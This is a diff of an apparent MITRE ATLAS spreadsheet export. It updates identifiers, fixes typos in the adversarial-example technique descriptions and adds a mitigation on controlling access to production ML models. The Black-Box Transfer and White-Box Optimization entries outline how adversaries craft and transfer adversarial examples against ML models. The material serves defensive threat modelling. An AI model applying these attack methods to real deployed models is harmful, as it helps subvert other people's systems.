--- a/excel-files/atlas.xlsx
+++ b/excel-files/atlas.xlsx
@@ -17,7 +17,7 @@
 </file>
 
 <file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
-<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1132" uniqueCount="594">
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1139" uniqueCount="599">
   <si>
     <t>ID</t>
   </si>
@@ -292,250 +292,250 @@
     <t>AML.T0043.000</t>
   </si>
   <si>
-    <t>attack-pattern--98c59f3e-2e5e-41e1-b450-e34ab1627268</t>
-  </si>
-  <si>
-    <t>attack-pattern--b41c38e9-80ca-421e-85c3-064440e12834</t>
-  </si>
-  <si>
-    <t>attack-pattern--c5573b25-a257-43f9-912a-26e3cccb0c33</t>
-  </si>
-  <si>
-    <t>attack-pattern--60a9f8e3-50fa-4dfd-8cc6-1598ce48abe3</t>
-  </si>
-  <si>
-    <t>attack-pattern--70cf5726-5a5b-4114-8e54-991c17803422</t>
-  </si>
-  <si>
-    <t>attack-pattern--ccf956b4-329e-4de8-8ba2-e784d152e0cb</t>
-  </si>
-  <si>
-    <t>attack-pattern--79cdc11c-2ca9-4a6a-96a0-18bd84943086</t>
-  </si>
-  <si>
-    <t>attack-pattern--a109f272-a57b-4c85-896d-0429af301e21</t>
-  </si>
-  <si>
-    <t>attack-pattern--ac7bb2f4-0eef-4d42-b2ee-99810c855123</t>
-  </si>
-  <si>
-    <t>attack-pattern--4c9375f7-5d39-4da5-beaa-edc8c143362f</t>
-  </si>
-  <si>
-    <t>attack-pattern--ba5645e5-d1ab-4f1f-8b82-cb0792543fa8</t>
-  </si>
-  <si>
-    <t>attack-pattern--8f7394cf-d0e4-4187-85c7-d278f77a9a09</t>
-  </si>
-  <si>
-    <t>attack-pattern--12887d43-f8b6-4191-adab-d1728687f951</t>
-  </si>
-  <si>
-    <t>attack-pattern--666f4d33-1a62-4ad7-9bf9-6387cd3f1fd7</t>
-  </si>
-  <si>
-    <t>attack-pattern--512fc1dc-d52b-483d-8bac-4f7034b9e407</t>
-  </si>
-  <si>
-    <t>attack-pattern--1f1b53cf-c34f-48d2-b9f2-32074392e4a8</t>
-  </si>
-  <si>
-    <t>attack-pattern--6a7f4fc2-272b-4f86-b137-70fa3e239f58</t>
-  </si>
-  <si>
-    <t>attack-pattern--1cc7f877-cb60-419a-bd1e-32b704b534d0</t>
-  </si>
-  <si>
-    <t>attack-pattern--b386c5b6-dbc8-429f-a771-c712e3f1227b</t>
-  </si>
-  <si>
-    <t>attack-pattern--9dc349e9-745e-4bb0-9f95-9c9c598045ac</t>
-  </si>
-  <si>
-    <t>attack-pattern--529fac49-5f88-4a3c-829f-eb50cb90bcf1</t>
-  </si>
-  <si>
-    <t>attack-pattern--8a115a02-2b88-4a3e-9212-a39dc086320b</t>
-  </si>
-  <si>
-    <t>attack-pattern--65c5e3b8-9296-46a2-ae7d-1b68a79cbe54</t>
-  </si>
-  <si>
-    <t>attack-pattern--8bcf7648-2683-421d-b623-bc539de59cb3</t>
-  </si>
-  <si>
-    <t>attack-pattern--f1e017cd-d02c-4e33-a880-9e39c1e47621</t>
-  </si>
-  <si>
-    <t>attack-pattern--bb747632-d988-45ff-9cb3-97d827b4d9db</t>
-  </si>
-  <si>
-    <t>attack-pattern--481486ed-846c-43ce-931b-86b8a18556b0</t>
-  </si>
-  <si>
-    <t>attack-pattern--3b829988-8bdb-4c4e-a4dd-500a3d3fd3e4</t>
-  </si>
-  <si>
-    <t>attack-pattern--81da9310-0555-4f71-9840-40e3799c85da</t>
-  </si>
-  <si>
-    <t>attack-pattern--0a648aab-7809-48b4-a505-cba29fa14c0c</t>
-  </si>
-  <si>
-    <t>attack-pattern--b5d1fd4f-861f-43e0-b1ca-ee8a3b47f7e1</t>
-  </si>
-  <si>
-    <t>attack-pattern--b8373cee-1dfb-4e37-8ea5-8d012b276ba7</t>
-  </si>
-  <si>
-    <t>attack-pattern--afcd723a-e5ff-4c09-8f72-fe16f7345af7</t>
-  </si>
-  <si>
-    <t>attack-pattern--c2f30865-5e3b-4fee-a415-94909ed31156</t>
-  </si>
-  <si>
-    <t>attack-pattern--eeb15ef7-70f9-45b1-8ce9-07d20ee9258a</t>
-  </si>
-  <si>
-    <t>attack-pattern--83c5ba15-5312-4c7d-bbb4-f9c4f2c6ffca</t>
-  </si>
-  <si>
-    <t>attack-pattern--68034561-a079-4052-9b64-427bfcff76ff</t>
-  </si>
-  <si>
-    <t>attack-pattern--4b86b97e-648e-44f9-8d2c-5c5557062f3e</t>
-  </si>
-  <si>
-    <t>attack-pattern--569d6edd-0140-4ab2-97b1-3635d62f40cc</t>
-  </si>
-  <si>
-    <t>attack-pattern--40792e08-d972-4af8-8eee-d6d6dc96d106</t>
-  </si>
-  <si>
-    <t>attack-pattern--3dc95dea-7507-447f-8ab5-e10beadaf606</t>
-  </si>
-  <si>
-    <t>attack-pattern--151214d2-2f04-474a-90a7-d0645dee2cbe</t>
-  </si>
-  <si>
-    <t>attack-pattern--3c248560-8041-48cc-8948-2c6815afe236</t>
-  </si>
-  <si>
-    <t>attack-pattern--9800daea-8512-48fe-a8a6-addf4e4472c3</t>
-  </si>
-  <si>
-    <t>attack-pattern--1511d7eb-cf6f-470f-b7fe-e001be2c2935</t>
-  </si>
-  <si>
-    <t>attack-pattern--b67fc223-fecf-4ee6-9de7-9392d9f04060</t>
-  </si>
-  <si>
-    <t>attack-pattern--99441fbc-17c8-47dc-8bdc-1053952b4cbb</t>
-  </si>
-  <si>
-    <t>attack-pattern--0d002b6b-d006-4aab-a7f9-fa69f4a1e675</t>
-  </si>
-  <si>
-    <t>attack-pattern--a5d2ba8c-0319-4c14-9831-f5b708c8863d</t>
-  </si>
-  <si>
-    <t>attack-pattern--4627c4e6-fb06-4bfa-add5-dc46e0043aff</t>
-  </si>
-  <si>
-    <t>attack-pattern--b6697dbf-3e3f-41ce-a212-361d1c0ca0e9</t>
-  </si>
-  <si>
-    <t>attack-pattern--0bab6cda-eb77-46b8-adfc-4274d0513c8f</t>
-  </si>
-  <si>
-    <t>attack-pattern--5f80868c-5996-4730-9326-f1c8a8630c5e</t>
-  </si>
-  <si>
-    <t>attack-pattern--2792e1f0-3132-4876-878d-a900b8a40e7d</t>
-  </si>
-  <si>
-    <t>attack-pattern--292ebe33-addc-4fe7-b2a9-4856293c4c96</t>
-  </si>
-  <si>
-    <t>attack-pattern--41dba0ab-b7bf-40b6-ac47-61dbfa16a53d</t>
-  </si>
-  <si>
-    <t>attack-pattern--b74030e3-0ee5-4c50-80ad-2393b3e1b161</t>
-  </si>
-  <si>
-    <t>attack-pattern--e0958449-a880-4410-bbb1-fa102030a883</t>
-  </si>
-  <si>
-    <t>attack-pattern--822cb1e2-f35f-4b35-a650-59b7770d4abc</t>
-  </si>
-  <si>
-    <t>attack-pattern--6945b742-f1d5-4a83-ba4a-d0e0de6620c3</t>
-  </si>
-  <si>
-    <t>attack-pattern--cb1bd497-e068-4b72-85af-626ab2f80e1d</t>
-  </si>
-  <si>
-    <t>attack-pattern--0799f2f2-1038-4391-ba1f-4117595db45a</t>
-  </si>
-  <si>
-    <t>attack-pattern--411ffbe6-e20e-468d-bdf6-01e9d549ff6a</t>
-  </si>
-  <si>
-    <t>attack-pattern--f662d072-38ee-4399-bdbb-b2f5ccfed446</t>
-  </si>
-  <si>
-    <t>attack-pattern--d93b2175-90a8-4250-821f-dcc3bbbe194c</t>
-  </si>
-  <si>
-    <t>attack-pattern--4f8b3c84-acb4-42aa-b059-103ab52498ad</t>
-  </si>
-  <si>
-    <t>attack-pattern--229ead06-da1e-443c-8ff1-e57a3ae0eb61</t>
-  </si>
-  <si>
-    <t>attack-pattern--2de27d58-3e31-42fc-a52a-5c350ce5639f</t>
-  </si>
-  <si>
-    <t>attack-pattern--3b1eeb78-bf3e-4d30-a376-d3f6ba67bd7c</t>
-  </si>
-  <si>
-    <t>attack-pattern--3247b43f-1888-4158-b3da-5b7c7dfaa4e2</t>
-  </si>
-  <si>
-    <t>attack-pattern--ed847783-c732-4b52-b72e-e823a870c09c</t>
-  </si>
-  <si>
-    <t>attack-pattern--0aac198b-3d5e-40ff-9460-290035d67717</t>
-  </si>
-  <si>
-    <t>attack-pattern--a40d6631-9042-4ba2-8a5b-5bd162ffb4bc</t>
-  </si>
-  <si>
-    <t>attack-pattern--042e340a-ea50-46f7-a2bc-70bbad949313</t>
-  </si>
-  <si>
-    <t>attack-pattern--d52b913b-808c-461d-8969-94cd5c9fe07b</t>
-  </si>
-  <si>
-    <t>attack-pattern--dd3e5970-2a1c-44b7-a94b-566a2a09dfb5</t>
-  </si>
-  <si>
-    <t>attack-pattern--7e8bff1e-af7d-4ace-829c-2b561b47e49d</t>
-  </si>
-  <si>
-    <t>attack-pattern--5e8e4108-beb6-479a-a617-323d425e5d03</t>
-  </si>
-  <si>
-    <t>attack-pattern--a1e68129-6d82-4091-9324-bbf148a2228b</t>
-  </si>
-  <si>
-    <t>attack-pattern--dc5ed9cb-7484-4f6c-9434-f420f17b13a8</t>
-  </si>
-  <si>
-    <t>attack-pattern--466f70e5-5b63-42ae-8dab-f54e0a928d55</t>
-  </si>
-  <si>
-    <t>attack-pattern--51c95da5-d7f1-4b57-9229-869b80305b37</t>
+    <t>attack-pattern--4fb3f968-42a6-43da-ae93-5f165afa82e3</t>
+  </si>
+  <si>
+    <t>attack-pattern--99ee109d-c2d0-48cc-9960-d1d2a9ecd0ad</t>
+  </si>
+  <si>
+    <t>attack-pattern--68b13c6b-c45d-4864-8186-189c77eaeb4d</t>
+  </si>
+  <si>
+    <t>attack-pattern--4d881f79-6a16-4e84-a795-4f3914045e67</t>
+  </si>
+  <si>
+    <t>attack-pattern--b6a3ddcc-60d7-4ae8-b702-eca52e3ace5d</t>
+  </si>
+  <si>
+    <t>attack-pattern--f4242e1a-203a-4b26-8a7f-967458b3751a</t>
+  </si>
+  <si>
+    <t>attack-pattern--1a328de1-1327-4ed3-98c0-0a2e9da558c0</t>
+  </si>
+  <si>
+    <t>attack-pattern--0dc3c131-1524-486e-a653-52240e95a22a</t>
+  </si>
+  <si>
+    <t>attack-pattern--e641274e-cac2-49c4-800f-abd0c0d825cd</t>
+  </si>
+  <si>
+    <t>attack-pattern--047c1235-9c18-4425-8494-6f8a75feabce</t>
+  </si>
+  <si>
+    <t>attack-pattern--35bd4e6e-9056-4115-9395-81735cfd1761</t>
+  </si>
+  <si>
+    <t>attack-pattern--d93718ee-12c5-4f76-9845-1bb14f948513</t>
+  </si>
+  <si>
+    <t>attack-pattern--36a77758-5a44-48e9-9545-14bd0a54756d</t>
+  </si>
+  <si>
+    <t>attack-pattern--acebf60b-3f22-4c75-a74f-4da8788fae17</t>
+  </si>
+  <si>
+    <t>attack-pattern--ff90c91c-2f51-48db-bc3c-e1d1ebf093f3</t>
+  </si>
+  <si>
+    <t>attack-pattern--2e3499bf-169b-4b77-ae04-c689e53a9895</t>
+  </si>
+  <si>
+    <t>attack-pattern--0ba8d50c-bbcc-4b6b-ac2d-0d78fdae0422</t>
+  </si>
+  <si>
+    <t>attack-pattern--50d26291-d3ac-451f-b051-3159ba12f39e</t>
+  </si>
+  <si>
+    <t>attack-pattern--05c6f7a3-1f8a-443d-a3d7-b4d54ab28e8c</t>
+  </si>
+  <si>
+    <t>attack-pattern--87f481a5-f4f5-4aa8-b19a-854634bdf08f</t>
+  </si>
+  <si>
+    <t>attack-pattern--61527318-c59b-4097-840c-adf9961bad42</t>
+  </si>
+  <si>
+    <t>attack-pattern--c3e09f44-3ff9-4db9-bf26-6a42bbcfbbb1</t>
+  </si>
+  <si>
+    <t>attack-pattern--a5f36bcf-f003-4bde-bd38-873ecb1160c6</t>
+  </si>
+  <si>
+    <t>attack-pattern--501caefa-6ffd-496b-be90-c644e9dc8037</t>
+  </si>
+  <si>
+    <t>attack-pattern--c3c55a49-99c1-4613-994a-9948228ef0c8</t>
+  </si>
+  <si>
+    <t>attack-pattern--dbd25a74-6024-4e30-9ba2-20428a447b70</t>
+  </si>
+  <si>
+    <t>attack-pattern--a0205c5e-9527-4020-8927-26c855a45008</t>
+  </si>
+  <si>
+    <t>attack-pattern--37d808a2-ca53-4b8f-a5c9-1dfc4bc59d6f</t>
+  </si>
+  <si>
+    <t>attack-pattern--5c4401a9-b406-4cbd-9c2d-af905a927c23</t>
+  </si>
+  <si>
+    <t>attack-pattern--22fd9008-0257-448b-a013-e253ece129e7</t>
+  </si>
+  <si>
+    <t>attack-pattern--26e0f122-c1ef-4d64-b20a-5cd81b1a1979</t>
+  </si>
+  <si>
+    <t>attack-pattern--ef5867e1-c9cc-4e52-8044-80053e308042</t>
+  </si>
+  <si>
+    <t>attack-pattern--8e2247ab-ddb9-4105-9bca-7dc756987394</t>
+  </si>
+  <si>
+    <t>attack-pattern--4e33fd0b-b624-4aa9-9c87-69acaa29437d</t>
+  </si>
+  <si>
+    <t>attack-pattern--7adc32b4-93f3-441f-9ad4-08f8643d450e</t>
+  </si>
+  <si>
+    <t>attack-pattern--1b7c868f-f99c-4b9c-98c2-fe8608cc39c4</t>
+  </si>
+  <si>
+    <t>attack-pattern--0c25c07a-0800-4635-ac9c-fa3fbd0b571d</t>
+  </si>
+  <si>
+    <t>attack-pattern--36d540cd-e31b-457e-8ac0-f34eec004a7a</t>
+  </si>
+  <si>
+    <t>attack-pattern--4af77ce4-5699-4bc0-85e5-9a7b115a9fda</t>
+  </si>
+  <si>
+    <t>attack-pattern--8eb6f82a-6c90-44a8-bd8d-a0ba632858a5</t>
+  </si>
+  <si>
+    <t>attack-pattern--d59358df-a685-4a5d-b65b-2f81bd91bc02</t>
+  </si>
+  <si>
+    <t>attack-pattern--80a3250a-c57b-445e-a668-c9bb8bf1b136</t>
+  </si>
+  <si>
+    <t>attack-pattern--657cba2d-a94b-46ed-96c6-b0ff825e79d6</t>
+  </si>
+  <si>
+    <t>attack-pattern--e04885b8-82ed-464c-9789-fafb7fdbbe30</t>
+  </si>
+  <si>
+    <t>attack-pattern--db789568-054a-498b-b585-56e8d5ce88f9</t>
+  </si>
+  <si>
+    <t>attack-pattern--a0da3f30-9270-418f-834e-7c79bed1065e</t>
+  </si>
+  <si>
+    <t>attack-pattern--ccd395a9-69f3-4f5e-a819-99f98bcc1c4b</t>
+  </si>
+  <si>
+    <t>attack-pattern--69268719-393f-41d3-801e-18d607474b01</t>
+  </si>
+  <si>
+    <t>attack-pattern--32287d8a-ac22-4d9f-a4ba-a55566fa8b36</t>
+  </si>
+  <si>
+    <t>attack-pattern--2308375d-743a-49ea-9fba-509a14e4a5e2</t>
+  </si>
+  <si>
+    <t>attack-pattern--21a73c23-60b5-46bc-b480-afa101fbac5f</t>
+  </si>
+  <si>
+    <t>attack-pattern--7344ac61-c0ef-484b-acb3-8ae385fcddb8</t>
+  </si>
+  <si>
+    <t>attack-pattern--4e479550-b51e-4399-bdda-4895d98f99fd</t>
+  </si>
+  <si>
+    <t>attack-pattern--7f8b61c0-e4a2-4a21-851a-7f8041a929c6</t>
+  </si>
+  <si>
+    <t>attack-pattern--2fb39d9e-2363-4672-a3c8-4c6c63c6b94c</t>
+  </si>
+  <si>
+    <t>attack-pattern--451cf23a-2346-4c3c-aa15-a629af8bb982</t>
+  </si>
+  <si>
+    <t>attack-pattern--aab01876-c6ba-4fac-a23a-25bc508e6a5c</t>
+  </si>
+  <si>
+    <t>attack-pattern--12b09c3e-46a9-4647-9df3-68cfde54ba21</t>
+  </si>
+  <si>
+    <t>attack-pattern--9d8044ed-6082-44d8-bc62-559f9296b580</t>
+  </si>
+  <si>
+    <t>attack-pattern--2f154be7-a9fa-4c5c-b446-5c4ca11049d7</t>
+  </si>
+  <si>
+    <t>attack-pattern--4719e4eb-78c9-4292-8059-a88886b65dfe</t>
+  </si>
+  <si>
+    <t>attack-pattern--481a4781-a4a9-473f-9ace-fc16e498bc27</t>
+  </si>
+  <si>
+    <t>attack-pattern--e2088636-a550-43d4-930c-603a33a024e1</t>
+  </si>
+  <si>
+    <t>attack-pattern--c46f18fa-cad2-4d24-8e9a-aa38bb49ed0d</t>
+  </si>
+  <si>
+    <t>attack-pattern--6d5ae8f7-0011-49bb-be21-6875ab3e0826</t>
+  </si>
+  <si>
+    <t>attack-pattern--689f398a-d130-4b8e-b359-5753973d8a8e</t>
+  </si>
+  <si>
+    <t>attack-pattern--92c88822-861d-4b04-b68d-56cd34ba35e1</t>
+  </si>
+  <si>
+    <t>attack-pattern--78b26a25-f4e6-48b4-9ce9-aab8bce5db7e</t>
+  </si>
+  <si>
+    <t>attack-pattern--02cec77c-40b1-418f-920b-a3f3217b669d</t>
+  </si>
+  <si>
+    <t>attack-pattern--b7dfb4dd-5325-4485-9b63-d57a63bd62d5</t>
+  </si>
+  <si>
+    <t>attack-pattern--3d802c02-cc2a-4f12-8ec5-2cfd47fa5592</t>
+  </si>
+  <si>
+    <t>attack-pattern--016a388c-d340-44a8-ab69-26a115e5f9a4</t>
+  </si>
+  <si>
+    <t>attack-pattern--91582fc7-5103-4d51-b520-1863eac391e1</t>
+  </si>
+  <si>
+    <t>attack-pattern--7b189c01-b058-4340-8500-e90b3220354a</t>
+  </si>
+  <si>
+    <t>attack-pattern--3d0968cd-f067-4b8b-a451-df6c521d3dab</t>
+  </si>
+  <si>
+    <t>attack-pattern--f81f0a08-3399-4006-9175-71a7dca2a917</t>
+  </si>
+  <si>
+    <t>attack-pattern--ea45586f-e473-43ca-a2b5-44a424eee5e6</t>
+  </si>
+  <si>
+    <t>attack-pattern--e6771085-d926-419c-831c-64cca5258442</t>
+  </si>
+  <si>
+    <t>attack-pattern--02efc53c-0695-44f1-8951-b3644058bb60</t>
+  </si>
+  <si>
+    <t>attack-pattern--3d1fb699-0cd0-420f-82ff-0f6947a10ecc</t>
+  </si>
+  <si>
+    <t>attack-pattern--9aedbc21-6bff-4826-a8a2-f8a414478fc0</t>
+  </si>
+  <si>
+    <t>attack-pattern--a562f5cf-fa56-42cb-8bca-3f39c9c8277e</t>
   </si>
   <si>
     <t>Acquire Infrastructure</t>
@@ -833,11 +833,11 @@
 </t>
   </si>
   <si>
-    <t xml:space="preserve">In Black-Box Transfer attacks, the adversary uses one or more proxy models (trained via [Create Proxy ML Model](/techniques/AML.T0005) or [Train Proxy via Replication](/techniques/AML.T0005.001)) models they have full access to and are representative of the target model.
+    <t xml:space="preserve">In Black-Box Transfer attacks, the adversary uses one or more proxy models (trained via [Create Proxy ML Model](/techniques/AML.T0005) or [Train Proxy via Replication](/techniques/AML.T0005.001)) they have full access to and are representative of the target model.
 The adversary uses [White-Box Optimization](/techniques/AML.T0043.000) on the proxy models to generate adversarial examples.
 If the set of proxy models are close enough to the target model, the adversarial example should generalize from one to another.
 This means that an attack that works for the proxy models will likely then work for the target model.
-If the adversary has [ML Model Inference API Access](/techniques/AML.T0040), they may use this [Verify Attack](/techniques/AML.T0042) that the attack is working and incorporate that information into their training process.
+If the adversary has [ML Model Inference API Access](/techniques/AML.T0040), they may use [Verify Attack](/techniques/AML.T0042) to confirm the attack is working and incorporate that information into their training process.
 </t>
   </si>
   <si>
@@ -1298,7 +1298,7 @@
   </si>
   <si>
     <t xml:space="preserve">In White-Box Optimization, the adversary has full access to the target model and optimizes the adversarial example directly.
-Adversarial examples trained in this manor are most effective against the target model.
+Adversarial examples trained in this manner are most effective against the target model.
 </t>
   </si>
   <si>
@@ -1548,7 +1548,7 @@
     <t>https://atlas.mitre.org/techniques/AML.T0043.000</t>
   </si>
   <si>
-    <t>31 October 2023</t>
+    <t>12 January 2024</t>
   </si>
   <si>
     <t>Resource Development</t>
@@ -1650,46 +1650,46 @@
     <t>AML.TA0003</t>
   </si>
   <si>
-    <t>x-mitre-tactic--169cdf3d-886b-4d3e-a26d-11a848920ea8</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--da8d1d9d-c45d-4d56-8874-d7cd5886dc25</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--e67a0f3d-a541-401f-801e-e62a9fdeca70</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--e81ccab1-e5f8-4d4f-be66-24dbe74fe5db</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--95274328-9e38-4bdd-9d2e-0e80e1256ff0</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--02d1fc74-a19e-406f-9ecc-df96a8d18856</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--7b38d743-e6b2-4a99-a497-bbc97db9a761</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--57175629-3f53-4980-a99d-8725df069f91</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--cf90e8f7-7829-431f-866f-66e6dd9e18a2</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--d4010b82-406a-46ba-83a1-23c16db77604</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--714edce4-f9ef-4b9a-b0ae-56e70a3cb15c</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--4acc5de3-5a7c-4ac8-8e7f-0e9f25e7e725</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--c79e43f1-2a18-48d4-af61-40091b1f1a37</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--90786da6-b4a6-4741-9bab-a87fdf42a05b</t>
+    <t>x-mitre-tactic--afe18db5-cd3b-404c-8993-3aaf488c5f62</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--f3deea7c-6d5a-49e7-ae3a-d70afc7889c9</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--9633dd67-f5e8-4a19-88aa-c9b6fcf9596c</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--c8c04179-cc2c-4a1d-b392-e6d4c42c3493</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--d9deeb4d-c193-469d-a1c8-52e6d145da0c</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--2538ccce-34dd-4470-8c3f-747be088b4e6</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--f7d86c97-d8a6-4b81-a4a3-b49191faeced</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--876860aa-e340-435c-824b-b5dd011c4c95</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--c05767a2-5965-4618-b66e-6a7fffed256a</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--813efb61-5bed-439d-a264-1b4e0ab89c37</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--8bb9a040-d075-4566-966d-4a6a588f4fad</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--39d150db-6130-4b2e-81e5-754b344a6a00</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--d4d10ed9-f6d7-4774-a9f0-68bf4970c5bd</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--4cd8009a-c196-4c3d-8eae-87afa661ed8e</t>
   </si>
   <si>
     <t>Defense Evasion</t>
@@ -1857,6 +1857,9 @@
     <t>AML.M0005</t>
   </si>
   <si>
+    <t>AML.M0019</t>
+  </si>
+  <si>
     <t>AML.M0012</t>
   </si>
   <si>
@@ -1905,61 +1908,64 @@
     <t>AML.M0016</t>
   </si>
   <si>
-    <t>course-of-action--825f21ab-f3c9-46ce-b539-28f295f519f8</t>
-  </si>
-  <si>
-    <t>course-of-action--c55ed072-eca7-41d6-b5e0-68c10753544d</t>
-  </si>
-  <si>
-    <t>course-of-action--da785068-ece5-4c52-b77d-39e1b24cb6d7</t>
-  </si>
-  <si>
-    <t>course-of-action--8bba19a7-fc6f-4381-8b34-2d43cdc14627</t>
-  </si>
-  <si>
-    <t>course-of-action--88aea80f-498f-403d-b82f-e76c44f9da94</t>
-  </si>
-  <si>
-    <t>course-of-action--c0f65fa8-8e05-4481-b934-ff2c452ae8c3</t>
-  </si>
-  <si>
-    <t>course-of-action--0b016f6f-2f61-493c-bf9d-02cad4c027df</t>
-  </si>
-  <si>
-    <t>course-of-action--79316871-3bf9-4a59-b517-b0156e84fcb4</t>
-  </si>
-  <si>
-    <t>course-of-action--04e9bb75-1b7e-4825-bc3f-774850d3c1ef</t>
-  </si>
-  <si>
-    <t>course-of-action--6b53cb14-eade-4760-8dae-75164e62cb7e</t>
-  </si>
-  <si>
-    <t>course-of-action--6cd8c9ca-bd46-489f-9ccb-5b76b8ef580e</t>
-  </si>
-  <si>
-    <t>course-of-action--4a048bfe-dab5-434b-86cc-f4586951ec0d</t>
-  </si>
-  <si>
-    <t>course-of-action--7e20b527-6299-4ee3-863e-59fee7cdaa9a</t>
-  </si>
-  <si>
-    <t>course-of-action--de7a696b-f688-454c-bf61-476a68b50e9f</t>
-  </si>
-  <si>
-    <t>course-of-action--532918ce-83cf-4f6f-86fa-8ad4024e91ab</t>
-  </si>
-  <si>
-    <t>course-of-action--8c2cb25a-46b0-4551-beeb-21e8425a48bd</t>
-  </si>
-  <si>
-    <t>course-of-action--32bd077a-90ce-4e97-ad40-8f130a1a7dab</t>
-  </si>
-  <si>
-    <t>course-of-action--a861f658-4203-48ba-bdca-fe068518eefb</t>
-  </si>
-  <si>
-    <t>course-of-action--e2cb599d-2714-4673-bc1a-976c471d7c58</t>
+    <t>course-of-action--37862c51-9708-45b5-b5a9-2ced6b96a68f</t>
+  </si>
+  <si>
+    <t>course-of-action--18bc0088-18e3-4574-9381-15609c31ceb0</t>
+  </si>
+  <si>
+    <t>course-of-action--4183e593-214b-4ed5-9502-6e8521d520b5</t>
+  </si>
+  <si>
+    <t>course-of-action--c240c5a6-335d-4b63-8a19-3a580f503554</t>
+  </si>
+  <si>
+    <t>course-of-action--007dbf17-b2dd-4f64-9a19-14ac15f48167</t>
+  </si>
+  <si>
+    <t>course-of-action--0df12e98-f47a-4126-8512-ff573cbfb6ea</t>
+  </si>
+  <si>
+    <t>course-of-action--a36f50c4-0980-4431-bd60-40fab20d484f</t>
+  </si>
+  <si>
+    <t>course-of-action--421d1626-df4b-4b92-86d7-e52fe8fee878</t>
+  </si>
+  <si>
+    <t>course-of-action--bd372226-3ba2-42c8-b3f0-2d626b2bf371</t>
+  </si>
+  <si>
+    <t>course-of-action--715592a1-75ba-4dc8-bf6b-68536514fb6c</t>
+  </si>
+  <si>
+    <t>course-of-action--034ac08c-c7bc-4480-964d-fe38d95cd72b</t>
+  </si>
+  <si>
+    <t>course-of-action--b42ad31a-c1af-4ad2-bf02-645f7067f5ee</t>
+  </si>
+  <si>
+    <t>course-of-action--8a2bc097-241b-4f3f-918f-73f69870991b</t>
+  </si>
+  <si>
+    <t>course-of-action--dadd5d29-8028-4363-8588-adc91ccda11d</t>
+  </si>
+  <si>
+    <t>course-of-action--61fec3f7-9ec5-419c-9cc3-28af52b4bd7a</t>
+  </si>
+  <si>
+    <t>course-of-action--e2578c53-56ee-411e-857f-7df0a8c0cb67</t>
+  </si>
+  <si>
+    <t>course-of-action--81b36332-b327-4f81-8017-73c70fe05de8</t>
+  </si>
+  <si>
+    <t>course-of-action--e718dbef-3905-4a58-9995-2e4c4f57e6f9</t>
+  </si>
+  <si>
+    <t>course-of-action--51811258-1da9-4724-95b0-06b4eebda05e</t>
+  </si>
+  <si>
+    <t>course-of-action--7d428c47-7519-4350-9230-f0ac2e108232</t>
   </si>
   <si>
     <t>Adversarial Input Detection</t>
@@ -1969,6 +1975,9 @@
   </si>
   <si>
     <t>Control Access to ML Models and Data at Rest</t>
+  </si>
+  <si>
+    <t>Control Access to ML Models and Data in Production</t>
   </si>
   <si>
     <t>Encrypt Sensitive Information</t>
@@ -2032,6 +2041,11 @@
 </t>
   </si>
   <si>
+    <t xml:space="preserve">Require users to verify their identities before accessing a production model.
+Require authentication for API endpoints and monitor production model queries to ensure compliance with usage policies and to prevent model misuse.
+</t>
+  </si>
+  <si>
     <t xml:space="preserve">Encrypt sensitive data such as ML models to protect against adversaries attempting to access sensitive data.
 </t>
   </si>
@@ -2048,7 +2062,9 @@
 </t>
   </si>
   <si>
-    <t xml:space="preserve">Deploying ML models to edge devices can increase the attack surface of the system. Consider serving models in the cloud to reduce the level of access the adversary has to the model.
+    <t xml:space="preserve">Deploying ML models to edge devices can increase the attack surface of the system.
+Consider serving models in the cloud to reduce the level of access the adversary has to the model.
+Also consider computing features in the cloud to prevent gray-box attacks, where an adversary has access to the model preprocessing methods.
 </t>
   </si>
   <si>
@@ -2087,6 +2103,7 @@
   </si>
   <si>
     <t xml:space="preserve">Validate that machine learning models perform as intended by testing for backdoor triggers or adversarial bias.
+Monitor model for concept drift and training data drift, which may indicate data tampering and poisoning.
 </t>
   </si>
   <si>
@@ -2096,6 +2113,7 @@
   <si>
     <t xml:space="preserve">Vulnerability scanning is used to find potentially exploitable software vulnerabilities to remediate them.
 File formats such as pickle files that are commonly used to store machine learning models can contain exploits that allow for arbitrary code execution.
+Both model artifacts and downstream products produced by models should be scanned for known vulnerabilities.
 </t>
   </si>
   <si>
@@ -2106,6 +2124,9 @@
   </si>
   <si>
     <t>https://atlas.mitre.org/mitigations/AML.M0005</t>
+  </si>
+  <si>
+    <t>https://atlas.mitre.org/mitigations/AML.M0019</t>
   </si>
   <si>
     <t>https://atlas.mitre.org/mitigations/AML.M0012</t>
@@ -5440,7 +5461,7 @@
 
 <file path=xl/worksheets/sheet3.xml><?xml version="1.0" encoding="utf-8"?>
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
-  <dimension ref="A1:H20"/>
+  <dimension ref="A1:H21"/>
   <sheetViews>
     <sheetView workbookViewId="0"/>
   </sheetViews>
@@ -5477,16 +5498,16 @@
         <v>499</v>
       </c>
       <c r="B2" t="s">
-        <v>518</v>
+        <v>519</v>
       </c>
       <c r="C2" t="s">
